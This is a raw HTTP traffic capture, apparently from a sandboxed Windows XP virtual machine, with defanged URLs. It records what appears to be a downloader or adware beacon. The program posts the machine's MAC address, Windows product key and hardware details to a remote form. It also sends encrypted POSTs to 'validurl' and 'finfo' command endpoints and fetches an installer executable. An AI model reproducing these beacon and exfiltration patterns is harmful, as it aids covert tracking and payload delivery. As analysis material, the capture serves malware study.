Connection: keep-alive
..<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">..<html xmlns="hXXp://VVV.w3.org/1999/xhtml" >..<head><title>.................</title></head>..<body>.. <form name="form1" method="post" action="DownloadInsertinfo.aspx?Browser=iexplore(6.00.2900.5512)&Resolution=1276*846&OS=Microsoft Windows XP Professional&KEY=76487-341-6719426-22526&Mac=00-0C-29-02-CD-FB&HardDrive=00000000000000000001&CPU=Intel(R) Core(TM) i7-4770 CPU @ 3.40GHz&Graphics=VMware SVGA II&Safe=&QQ=&Sougou=&Lmarkid=88&Wmarkid=63&Mtype=19&tick=1446872435&flag=e96394f018d0f2b7394f88916459f7e4&status=2&qqnumber=&downloadtime=0&setuptime=0&downloadflag=0&v=V1.9" id="form1">..<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUJNzgzNDMwNTMzZGSnkXrJ7Bg7YIIyJXb iSnRqd8R7Q==" />..<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="05019BFC" />.. <div style="text-align:center">.. <img title="webgo".. </div>.. </form>..</body>..</html>......
GET /1/aHR0cDovLzEyMy5zaGlwaW5idXMuY29tL3UucGhwP2lkPTg5 HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: 17990.vicp.net
Connection: Keep-Alive
HTTP/1.1 404 Not Found
Server: nginx
Date: Sat, 07 Nov 2015 04:59:45 GMT
Content-Type: text/html
Content-Length: 102
Connection: keep-alive
ETag: "550c2d1a-66"
<script language="javascript" type="text/javascript" src="hXXp://js.users.51.la/17476535.js"></script>HTTP/1.1 404 Not Found..Server: nginx..Date: Sat, 07 Nov 2015 04:59:45 GMT..Content-Type: text/html..Content-Length: 102..Connection: keep-alive..ETag: "550c2d1a-66"..<script language="javascript" type="text/javascript" src="hXXp://js.users.51.la/17476535.js"></script>..
POST /query?cmd=validurl HTTP/1.1
Content-Length: 125
Connection: Keep-Alive
.#4H.......QC...............................y6...............................................................................
HTTP/1.1 302 Moved Temporarily
Date: Sat, 07 Nov 2015 05:00:08 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Location: hXXp://static.tieba.baidu.com/tb/error.html?tc=00089320501911494410110713
Server: Apache
tracecode: 00089320501911494410110713
Set-Cookie: BAIDUID=DA04B4066DA68D7236FB11CB7AC286DA:FG=1; expires=Sun, 06-Nov-16 05:00:08 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
P3P: CP=" OTI DSP COR IVA OUR IND COM "
9a..<html>..<head><title>302 Found</title></head>..<body bgcolor="white">..<center><h1>302 Found</h1></center>..<hr><center>nginx</center>..</body>..</html>..0..
POST /query?cmd=url2finfo HTTP/1.1
Content-Length: 102
Connection: Keep-Alive
.#4H.......:R6.f............................77.9:;TIJOznm.)k'78""#b.!".<??=49x..w75<1gXWQM...ghijklmno
HTTP/1.1 302 Moved Temporarily
Date: Sat, 07 Nov 2015 04:59:59 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Location: hXXp://static.tieba.baidu.com/tb/error.html?tc=35991409270581376522110712
Server: Apache
tracecode: 35991409270581376522110712
Set-Cookie: BAIDUID=005B09C6D83A1A4B8CA6E1AA9F73D13D:FG=1; expires=Sun, 06-Nov-16 04:59:59 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
P3P: CP=" OTI DSP COR IVA OUR IND COM "
9a..<html>..<head><title>302 Found</title></head>..<body bgcolor="white">..<center><h1>302 Found</h1></center>..<hr><center>nginx</center>..</body>..</html>..0..
GET /dc.base/1.0.3/css/base.min.css?1.0.247 HTTP/1.1
Accept: */*
Referer: hXXp://VVV.meiheitou.com/?89-sd--ant-
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: cdn.daicuo.cc
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx
Date: Sat, 07 Nov 2015 04:58:41 GMT
Content-Type: text/css
Content-Length: 1691
Last-Modified: Thu, 16 Apr 2015 11:10:24 GMT
Connection: keep-alive
Vary: Accept-Encoding
ETag: "552f98a0-69b"
Expires: Sat, 07 Nov 2015 16:58:41 GMT
Cache-Control: max-age=43200
Accept-Ranges: bytes
@font-face{font-family:'iconfont';src:url('hXXp://at.alicdn.com/t/font_1415073294_4967172.eot');src:url('hXXp://at.alicdn.com/t/font_1415073294_4967172.eot?#iefix') format('embedded-opentype'),url('hXXp://at.alicdn.com/t/font_1415073294_4967172.woff') format('woff'),url('hXXp://at.alicdn.com/t/font_1415073294_4967172.ttf') format('truetype'),url('http://at.alicdn.com/t/font_1415073294_4967172.svg#iconfont') format('svg');}.iconfont{position:relative;top:1px;display:inline-block;font-weight:normal;line-height:1;font-family:"iconfont" !important;font-style:normal;-webkit-font-smoothing:antialiased;-webkit-text-stroke-width:0.2px;-moz-osx-font-smoothing:grayscale;}.iconfont:empty{width:1em;}.icon-tsina:before{content:"\1111";}.icon-tqq:before{content:"\5555";}.icon-weixin:before{content:"\e607";}.icon-qq:before{content:"\7777";}.icon-qzone:before{content:"\9999";}.icon-top:before{content:"\4444";}.icon-dingyue:before{content:"\2222";}.icon-github:before{content:"\3333";}.icon-ma:before{content:"\6666";}.icon-yuedu:before{content:"\8888";}.icon-biaoqing:before{content:"\e600";}.icon-chuangshiren:before{content:"\e602";}.icon-guanliyuan:before{content:"\e601";}.icon-fenxiang:before{content:"\e603";}.icon-qz:before{content:"\e604";}.icon-addgroup:before{content:"\e605";}.icon-qunzu:before{content:"\e606";}.icon-tuijian:before{content:"\e608";}.icon-discover:before{content:"\e60a";}.icon-website:before{content:"\e60c";}.icon-audit:before{content:"\e612";}.icon-music:before{content:"\e60e";}.icon-video:before{content:"
<<< skipped >>>
POST /query?cmd=validurl HTTP/1.1
Content-Length: 117
Connection: Keep-Alive
.#4H.......I.l...........................................................................n.33455381%hdRjcOd`.:pnr....
HTTP/1.1 302 Moved Temporarily
Date: Sat, 07 Nov 2015 05:00:05 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Location: hXXp://static.tieba.baidu.com/tb/error.html?tc=00058821140271667466110713
Server: Apache
tracecode: 00058821140271667466110713
Set-Cookie: BAIDUID=DC3B4452E5376F0DF4258E7C406A2A02:FG=1; expires=Sun, 06-Nov-16 05:00:05 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
P3P: CP=" OTI DSP COR IVA OUR IND COM "
9a..<html>..<head><title>302 Found</title></head>..<body bgcolor="white">..<center><h1>302 Found</h1></center>..<hr><center>nginx</center>..</body>..</html>..0..
POST /query?cmd=url2finfo HTTP/1.1
Content-Length: 123
Connection: Keep-Alive
.#4H.......O.............................................................................to-24564<92$oeQk|Ngax;so}....... !
HTTP/1.1 302 Moved Temporarily
Date: Sat, 07 Nov 2015 04:59:59 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Location: hXXp://static.tieba.baidu.com/tb/error.html?tc=35999935041911494410110712
Server: Apache
tracecode: 35999935041911494410110712
Set-Cookie: BAIDUID=005B09C6D83A1A4BFBF5A997083E266E:FG=1; expires=Sun, 06-Nov-16 04:59:59 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
P3P: CP=" OTI DSP COR IVA OUR IND COM "
9a..<html>..<head><title>302 Found</title></head>..<body bgcolor="white">..<center><h1>302 Found</h1></center>..<hr><center>nginx</center>..</body>..</html>..0..
GET /?89-sd--ant- HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml xml, */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.meiheitou.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx
Date: Sat, 07 Nov 2015 04:59:49 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Set-Cookie: sessionid=b1jtdrt74nrns94nt4ifo7m065; expires=Sat, 07-Nov-2015 05:59:49 GMT; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
X-Powered-By: ThinkPHP
2218..<!DOCTYPE html>..<html lang="zh-cn">..<head>..<meta charset="utf-8">..<meta http-equiv="X-UA-Compatible" content="IE=edge">..<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0">..<meta name="renderer" content="webkit">..<title>.................._...1..._.........</title>..<meta name="keywords" content="" />..<meta name="description" content="" />..<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />..<link rel="stylesheet" type="text/css" href="hXXp://cdn.daicuo.cc/dc.base/1.0.3/css/base.min.css?1.0.247" />..<link rel="stylesheet" type="text/css" href="/Public/bootstrap/3.3.5/css/bootstrap.min.css?1.0.247" />..<link rel="stylesheet" type="text/css" href="/View/Home/Task/css.base.css?1.0.247" />..<link rel="stylesheet" type="text/css" href="/View/Home/Task/css.task.css?1.0.247" />..<!--[if lt IE 9]>..<script src="/Public/html5shiv/3.7.2/html5shiv.min.js"></script>..<script src="/Public/respond/1.4.2/respond.min.js"></script>..<![endif]-->..<script>var dc={root:"/",domain:"VVV.xieshouz.com",id:"",page:"1",userid:"",username:"",'lazyload':""};</script>..</head>..<body>..<nav class="navbar navbar-inverse" role="navigation">.. <div class="container">.. <div class="row"><div class="col-md-12 col-md-offset-0">.. <div class="navbar-header">.. <butto
<<< skipped >>>
GET /Public/bootstrap/3.3.5/css/bootstrap.min.css?1.0.247 HTTP/1.1
Accept: */*
Referer: hXXp://VVV.meiheitou.com/?89-sd--ant-
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.meiheitou.com
Connection: Keep-Alive
Cookie: sessionid=b1jtdrt74nrns94nt4ifo7m065
HTTP/1.1 200 OK
Server: nginx
Date: Sat, 07 Nov 2015 04:59:49 GMT
Content-Type: text/css
Content-Length: 122543
Last-Modified: Mon, 12 Oct 2015 17:10:25 GMT
Connection: keep-alive
Vary: Accept-Encoding
ETag: "561be981-1deaf"
Expires: Sat, 07 Nov 2015 16:59:49 GMT
Cache-Control: max-age=43200
Accept-Ranges: bytes
/*!.. * Bootstrap v3.3.5 (hXXp://getbootstrap.com).. * Copyright 2011-2015 Twitter, Inc... * Licensed under MIT (hXXps://github.com/twbs/bootstrap/blob/master/LICENSE).. *//*! normalize.css v3.0.3 | MIT License | github.com/necolas/normalize.css */html{font-family:sans-serif;-webkit-text-size-adjust:100%;-ms-text-size-adjust:100%}body{margin:0}article,aside,details,figcaption,figure,footer,header,hgroup,main,menu,nav,section,summary{display:block}audio,canvas,progress,video{display:inline-block;vertical-align:baseline}audio:not([controls]){display:none;height:0}[hidden],template{display:none}a{background-color:transparent}a:active,a:hover{outline:0}abbr[title]{border-bottom:1px dotted}b,strong{font-weight:700}dfn{font-style:italic}h1{margin:.67em 0;font-size:2em}mark{color:#000;background:#ff0}small{font-size:80%}sub,sup{position:relative;font-size:75%;line-height:0;vertical-align:baseline}sup{top:-.5em}sub{bottom:-.25em}img{border:0}svg:not(:root){overflow:hidden}figure{margin:1em 40px}hr{height:0;-webkit-box-sizing:content-box;-moz-box-sizing:content-box;box-sizing:content-box}pre{overflow:auto}code,kbd,pre,samp{font-family:monospace,monospace;font-size:1em}button,input,optgroup,select,textarea{margin:0;font:inherit;color:inherit}button{overflow:visible}button,select{text-transform:none}button,html input[type=button],input[type=reset],input[type=submit]{-webkit-appearance:button;cursor:pointer}button[disabled],html input[disabled]{cursor:default}button::-moz-focus-inner,input::-moz-focus-inner{padding:0;borde
<<< skipped >>>
GET /Public/respond/1.4.2/respond.min.js HTTP/1.1
Accept: */*
Referer: hXXp://VVV.meiheitou.com/?89-sd--ant-
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.meiheitou.com
Connection: Keep-Alive
Cookie: sessionid=b1jtdrt74nrns94nt4ifo7m065
HTTP/1.1 200 OK
Server: nginx
Date: Sat, 07 Nov 2015 04:59:53 GMT
Content-Type: application/javascript
Content-Length: 4381
Last-Modified: Sat, 14 Mar 2015 18:06:30 GMT
Connection: keep-alive
Vary: Accept-Encoding
ETag: "550478a6-111d"
Expires: Sat, 07 Nov 2015 16:59:53 GMT
Cache-Control: max-age=43200
Accept-Ranges: bytes
/*! Respond.js v1.4.2: min/max-width media query polyfill * Copyright 2013 Scott Jehl.. * Licensed under hXXps://github.com/scottjehl/Respond/blob/master/LICENSE-MIT.. * */..!function(a){"use strict";a.matchMedia=a.matchMedia||function(a){var b,c=a.documentElement,d=c.firstElementChild||c.firstChild,e=a.createElement("body"),f=a.createElement("div");return f.id="mq-test-1",f.style.cssText="position:absolute;top:-100em",e.style.background="none",e.appendChild(f),function(a){return f.innerHTML='<style media="' a '"> #mq-test-1 { width: 42px; }</style>',c.insertBefore(e,d),b=42===f.offsetWidth,c.removeChild(e),{matches:b,media:a}}}(a.document)}(this),function(a){"use strict";function b(){u(!0)}var c={};a.respond=c,c.update=function(){};var d=[],e=function(){var b=!1;try{b=new a.XMLHttpRequest}catch(c){b=new a.ActiveXObject("Microsoft.XMLHTTP")}return function(){return b}}(),f=function(a,b){var c=e();c&&(c.open("GET",a,!0),c.onreadystatechange=function(){4!==c.readyState||200!==c.status&&304!==c.status||b(c.responseText)},4!==c.readyState&&c.send(null))};if(c.ajax=f,c.queue=d,c.regex={media:/@media[^\{] \{([^\{\}]*\{[^\}\{]*\}) /gi,keyframes:/@(?:\-(?:o|moz|webkit)\-)?keyframes[^\{] \{(?:[^\{\}]*\{[^\}\{]*\}) [^\}]*\}/gi,urls:/(url\()['"]?([^\/\)'"][^:\)'"] )['"]?(\))/g,findStyles:/@media *([^\{] )\{([\S\s] ?)$/,only:/(only\s )?([a-zA-Z] )\s?/,minw:/\([\s]*min\-width\s*:[\s]*([\s]*[0-9\.] )(px|em)[\s]*\)/,maxw:/\([\s]*max\-width\s*:[\s]*([\s]*[0-9\.] )(px|em)[\s]*\)/},c.mediaQueriesSupported=a.mat
<<< skipped >>>
GET /Public/bootstrap/3.3.5/css/bootstrap.min.css?1.0.247 HTTP/1.1
Accept: */*
Accept-Language: en-us
Referer: hXXp://VVV.meiheitou.com/?89-sd--ant-
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.meiheitou.com
Connection: Keep-Alive
Cookie: sessionid=b1jtdrt74nrns94nt4ifo7m065
HTTP/1.1 200 OK
Server: nginx
Date: Sat, 07 Nov 2015 04:59:53 GMT
Content-Type: text/css
Content-Length: 122543
Last-Modified: Mon, 12 Oct 2015 17:10:25 GMT
Connection: keep-alive
Vary: Accept-Encoding
ETag: "561be981-1deaf"
Expires: Sat, 07 Nov 2015 16:59:53 GMT
Cache-Control: max-age=43200
Accept-Ranges: bytes
/*!.. * Bootstrap v3.3.5 (hXXp://getbootstrap.com).. * Copyright 2011-2015 Twitter, Inc... * Licensed under MIT (hXXps://github.com/twbs/bootstrap/blob/master/LICENSE).. *//*! normalize.css v3.0.3 | MIT License | github.com/necolas/normalize.css */html{font-family:sans-serif;-webkit-text-size-adjust:100%;-ms-text-size-adjust:100%}body{margin:0}article,aside,details,figcaption,figure,footer,header,hgroup,main,menu,nav,section,summary{display:block}audio,canvas,progress,video{display:inline-block;vertical-align:baseline}audio:not([controls]){display:none;height:0}[hidden],template{display:none}a{background-color:transparent}a:active,a:hover{outline:0}abbr[title]{border-bottom:1px dotted}b,strong{font-weight:700}dfn{font-style:italic}h1{margin:.67em 0;font-size:2em}mark{color:#000;background:#ff0}small{font-size:80%}sub,sup{position:relative;font-size:75%;line-height:0;vertical-align:baseline}sup{top:-.5em}sub{bottom:-.25em}img{border:0}svg:not(:root){overflow:hidden}figure{margin:1em 40px}hr{height:0;-webkit-box-sizing:content-box;-moz-box-sizing:content-box;box-sizing:content-box}pre{overflow:auto}code,kbd,pre,samp{font-family:monospace,monospace;font-size:1em}button,input,optgroup,select,textarea{margin:0;font:inherit;color:inherit}button{overflow:visible}button,select{text-transform:none}button,html input[type=button],input[type=reset],input[type=submit]{-webkit-appearance:button;cursor:pointer}button[disabled],html input[disabled]{cursor:default}button::-moz-focus-inner,input::-moz-focus-inner{padding:0;borde
<<< skipped >>>
GET /View/Home/Task/css.base.css?1.0.247 HTTP/1.1
Accept: */*
Accept-Language: en-us
Referer: hXXp://VVV.meiheitou.com/?89-sd--ant-
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.meiheitou.com
Connection: Keep-Alive
Cookie: sessionid=b1jtdrt74nrns94nt4ifo7m065
HTTP/1.1 200 OK
Server: nginx
Date: Sat, 07 Nov 2015 04:59:55 GMT
Content-Type: text/css
Content-Length: 4860
Last-Modified: Mon, 19 Oct 2015 03:49:41 GMT
Connection: keep-alive
Vary: Accept-Encoding
ETag: "56246855-12fc"
Expires: Sat, 07 Nov 2015 16:59:55 GMT
Cache-Control: max-age=43200
Accept-Ranges: bytes
html,body {.. overflow-x: hidden;..}..body {.. background: #ebebeb;.. position: relative;...font-family: "Helvetica Neue","Microsoft YaHei","............",Helvetica,Tahoma,Arial,STXihei,sans-serif;..}..a{.. color: #333;..}..a:hover,a:focus {.. color: #f60;.. text-decoration: none;..}..a:focus {.. outline: thin dotted;.. outline: 5px auto -webkit-focus-ring-color;.. outline-offset: -2px;..}../*bootstrap fieldset*/..fieldset{..}..legend{...width:auto;..}../*bootstrap family*/../*model*/...modal-scrollbar-measure {...display:none..}../*bootstrap nav*/...navbar{...margin:0px;...border:none;...border-radius: 0;..}...navbar-inverse .navbar-nav>li>a{.. color: #fff;..}...navbar-inverse .navbar-nav>li>a:hover{.. color: #999;..}...navbar-inverse .navbar-nav>.active>a,...navbar-inverse .navbar-nav>.active>a:focus,...navbar-inverse .navbar-nav>.active>a:hover{.. color: #ddd;.. background-color:#080808;..}...navbar-collapse{...font-size: 1.1em;..}../*bootstrap page*/...pagination > li > a,...pagination > li > span {.. position: relative;.. float: left;.. padding: 6px 12px;.. margin: 0px 5px;.. line-height: 1.45;.. color: #222;.. text-decoration: none;.. background-color: #fff;.. border: 1px solid #ddd;..}...pagination > li.disabled > a{.. font-weight: bold;...}...pagination > li > a:hover,...pagination > li > span:hover,...pagination > li > a:focus,...pagination > li > span:focus {.. color: #2cab93;.. background-color: #eee;..
<<< skipped >>>
GET /View/Home/Task/css.task.css?1.0.247 HTTP/1.1
Accept: */*
Accept-Language: en-us
Referer: hXXp://VVV.meiheitou.com/?89-sd--ant-
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.meiheitou.com
Connection: Keep-Alive
Cookie: sessionid=b1jtdrt74nrns94nt4ifo7m065
HTTP/1.1 200 OK
Server: nginx
Date: Sat, 07 Nov 2015 04:59:55 GMT
Content-Type: text/css
Content-Length: 2042
Last-Modified: Mon, 19 Oct 2015 07:02:19 GMT
Connection: keep-alive
Vary: Accept-Encoding
ETag: "5624957b-7fa"
Expires: Sat, 07 Nov 2015 16:59:55 GMT
Cache-Control: max-age=43200
Accept-Ranges: bytes
/*task inc*/..h4,h4 a{.. color: #F60;..}..h4 a:hover{.. color: #333;..}../*channel/list/tag*/...dc-item li{.. margin-bottom: 20px;.. overflow: hidden;..}...dc-item p{ .. line-height: 2.0;..}...dc-item p.lead{...color: #666;...margin: 0px;...font-size: 1.0em;..}...dc-item p.lead a{...color: #666;...margin-left: 5px;..}...dc-item p.lead a:hover{...color: #017e66;..}...dc-item p.lead .btn-sm{...padding:2px 4px;...margin:2px;..}...dc-item p.info{...color: #888;...font-size: 1.0em;..}...dc-item-hot li{...color: #f60;...padding: 5px 0;..}../*detail*/..a.dc-prev{...margin-right:10px;..}...dc-task{...padding-top:10px;.. margin-bottom: 15px;...color: #333;...font-size: 1.25em;...overflow: hidden;..}...dc-task p{...line-height:1.4em;..}...dc-task .score{...font-size:1.0em;...color:#666;..}...dc-task .score em{...color: #F30;...margin:0 5px;...font-style:normal;...font-size:1.4em;..}...dc-task .cycle{...font-size:1.0em;...color: #F30;...margin:0 5px;...font-weight:normal;..}...dc-task-pad{...padding:40px 0;..}...dc-content{.. margin-bottom: 15px;...font-size: 1.2em;.. line-height: 1.8em;...color: #555;...overflow: hidden;..}...dc-content a{.. color: #f60;..}...dc-content a:hover{.. color: #333;..}...dc-content .nav-tabs{.. margin-top:15px;..}...dc-content .tab-content{.. padding-top: 15px;..}...dc-content .apply{.. padding:20px 0;.. text-align: center;..}...dc-content .dc-image{...margin:0 auto;..}...dc-content table td{.. padding-left: 10px;..}...dc-content pre {...border-radius: 0;.. margin: 1.64em 0;..
<<< skipped >>>
GET /Public/bootstrap/3.3.5/js/bootstrap.min.js?1.0.247 HTTP/1.1
Accept: */*
Referer: hXXp://VVV.meiheitou.com/?89-sd--ant-
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.meiheitou.com
Connection: Keep-Alive
Cookie: sessionid=b1jtdrt74nrns94nt4ifo7m065
HTTP/1.1 200 OK
Server: nginx
Date: Sat, 07 Nov 2015 04:59:57 GMT
Content-Type: application/javascript
Content-Length: 36816
Last-Modified: Tue, 16 Jun 2015 01:13:22 GMT
Connection: keep-alive
Vary: Accept-Encoding
ETag: "557f7832-8fd0"
Expires: Sat, 07 Nov 2015 16:59:57 GMT
Cache-Control: max-age=43200
Accept-Ranges: bytes
/*!. * Bootstrap v3.3.5 (hXXp://getbootstrap.com). * Copyright 2011-2015 Twitter, Inc.. * Licensed under the MIT license. */.if("undefined"==typeof jQuery)throw new Error("Bootstrap's JavaScript requires jQuery"); function(a){"use strict";var b=a.fn.jquery.split(" ")[0].split(".");if(b[0]<2&&b[1]<9||1==b[0]&&9==b[1]&&b[2]<1)throw new Error("Bootstrap's JavaScript requires jQuery version 1.9.1 or higher")}(jQuery), function(a){"use strict";function b(){var a=document.createElement("bootstrap"),b={WebkitTransition:"webkitTransitionEnd",MozTransition:"transitionend",OTransition:"oTransitionEnd otransitionend",transition:"transitionend"};for(var c in b)if(void 0!==a.style[c])return{end:b[c]};return!1}a.fn.emulateTransitionEnd=function(b){var c=!1,d=this;a(this).one("bsTransitionEnd",function(){c=!0});var e=function(){c||a(d).trigger(a.support.transition.end)};return setTimeout(e,b),this},a(function(){a.support.transition=b(),a.support.transition&&(a.event.special.bsTransitionEnd={bindType:a.support.transition.end,delegateType:a.support.transition.end,handle:function(b){return a(b.target).is(this)?b.handleObj.handler.apply(this,arguments):void 0}})})}(jQuery), function(a){"use strict";function b(b){return this.each(function(){var c=a(this),e=c.data("bs.alert");e||c.data("bs.alert",e=new d(this)),"string"==typeof b&&e[b].call(c)})}var c='[data-dismiss="alert"]',d=function(b){a(b).on("click",c,this.close)};d.VERSION="3.3.5",d.TRANSITION_DURATION=150,d.prototype.close=function(b){function c(){g.detach().trigge
<<< skipped >>>
POST /query?cmd=url2finfo HTTP/1.1
Content-Length: 123
Connection: Keep-Alive
.#4H.......O.............................................................................to-24564<92$oeQk|Ngax;so}....... !
HTTP/1.1 302 Moved Temporarily
Date: Sat, 07 Nov 2015 04:59:59 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Location: hXXp://static.tieba.baidu.com/tb/error.html?tc=35991274551213477898110712
Server: Apache
tracecode: 35991274551213477898110712
Set-Cookie: BAIDUID=005B09C6D83A1A4BCA2EF032D9175BBE:FG=1; expires=Sun, 06-Nov-16 04:59:59 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
P3P: CP=" OTI DSP COR IVA OUR IND COM "
9a..<html>..<head><title>302 Found</title></head>..<body bgcolor="white">..<center><h1>302 Found</h1></center>..<hr><center>nginx</center>..</body>..</html>..0..
POST /query?cmd=validurl HTTP/1.1
Content-Length: 117
Connection: Keep-Alive
.#4H.......I.l...........................................................................n.33455381%hdRjcOd`.:pnr....
HTTP/1.1 302 Moved Temporarily
Date: Sat, 07 Nov 2015 05:00:01 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Location: hXXp://static.tieba.baidu.com/tb/error.html?tc=00016551091911494410110713
Server: Apache
tracecode: 00016551091911494410110713
Set-Cookie: BAIDUID=69DAC83DF6D595A311E23693EE9228DF:FG=1; expires=Sun, 06-Nov-16 05:00:01 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
P3P: CP=" OTI DSP COR IVA OUR IND COM "
9a..<html>..<head><title>302 Found</title></head>..<body bgcolor="white">..<center><h1>302 Found</h1></center>..<hr><center>nginx</center>..</body>..</html>..0..
POST /query?cmd=url2finfo HTTP/1.1
Content-Length: 123
Connection: Keep-Alive
.#4H.......O.............................................................................to-24564<92$oeQk|Ngax;so}....... !
HTTP/1.1 302 Moved Temporarily
Date: Sat, 07 Nov 2015 05:00:00 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Location: hXXp://static.tieba.baidu.com/tb/error.html?tc=00008213770658453514110713
Server: Apache
tracecode: 00008213770658453514110713
Set-Cookie: BAIDUID=32F3C5706F8B24028AF7668DD8FF2F78:FG=1; expires=Sun, 06-Nov-16 05:00:00 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
P3P: CP=" OTI DSP COR IVA OUR IND COM "
9a..<html>..<head><title>302 Found</title></head>..<body bgcolor="white">..<center><h1>302 Found</h1></center>..<hr><center>nginx</center>..</body>..</html>..0..
POST /commit?cmd=finfo HTTP/1.1
Content-Length: 543
Connection: Keep-Alive
.#4H........................................!#$%&"k." ,-.
3234!~:9:;.i.=@ABK..DGHIBKLMOOPQ.STU_.b[Z[\U.ebabcK/\ehijc'Wlopqv?Nwvwx}4A~}~......................................................................................................... .........?.m.............&'...l..j..._...........5..Pe%......Z..6.......Y...B....4....q...{.k..Q,7.c=(.`^.{...0.r*..&=.z&,...^.......f....!.......z....c..wg...N...{aP. ...7..KZ.?..j.....R.|...:..........Qb_...~l .0.s...o..xf.d.=9...I....E(.y....d."..4t..S...0.@E..Jpz...-...H.;^}..Y....
.M.......
HTTP/1.1 302 Moved Temporarily
Date: Sat, 07 Nov 2015 05:00:13 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Location: hXXp://static.tieba.baidu.com/tb/error.html?tc=00137261760315632138110713
Server: Apache
tracecode: 00137261760315632138110713
Set-Cookie: BAIDUID=67699F784E2A0D23D0594A86343DB7B0:FG=1; expires=Sun, 06-Nov-16 05:00:13 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
P3P: CP=" OTI DSP COR IVA OUR IND COM "
9a..<html>..<head><title>302 Found</title></head>..<body bgcolor="white">..<center><h1>302 Found</h1></center>..<hr><center>nginx</center>..</body>..</html>..0..
POST /query?cmd=validurl HTTP/1.1
Content-Length: 96
Connection: Keep-Alive
.#4H.......4.`d.............................8.>?@)674.ih%$d*<=%'8.1<9z;:40;4s..r..\]PTF..lmno
HTTP/1.1 302 Moved Temporarily
Date: Sat, 07 Nov 2015 05:00:10 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Location: hXXp://static.tieba.baidu.com/tb/error.html?tc=00101112390271667466110713
Server: Apache
tracecode: 00101112390271667466110713
Set-Cookie: BAIDUID=BA43C3B59B01A15F5DD3D9CDD70F255F:FG=1; expires=Sun, 06-Nov-16 05:00:10 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
P3P: CP=" OTI DSP COR IVA OUR IND COM "
9a..<html>..<head><title>302 Found</title></head>..<body bgcolor="white">..<center><h1>302 Found</h1></center>..<hr><center>nginx</center>..</body>..</html>..0..
GET /invc/xfspeed/qqpcmgr/versetup/portal/PCMgr_Setup_10_9_16345_222.exe HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; QQPCMgr7.0)
Host: dlied6.qq.com
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache
HTTP/1.1 302 Found
Server: nws 1.2.15
Connection: close
Date: Sat, 07 Nov 2015 05:00:16 GMT
Expires: Sat, 07 Nov 2015 05:00:16 GMT
Cache-Control: max-age=0
Content-Length: 89
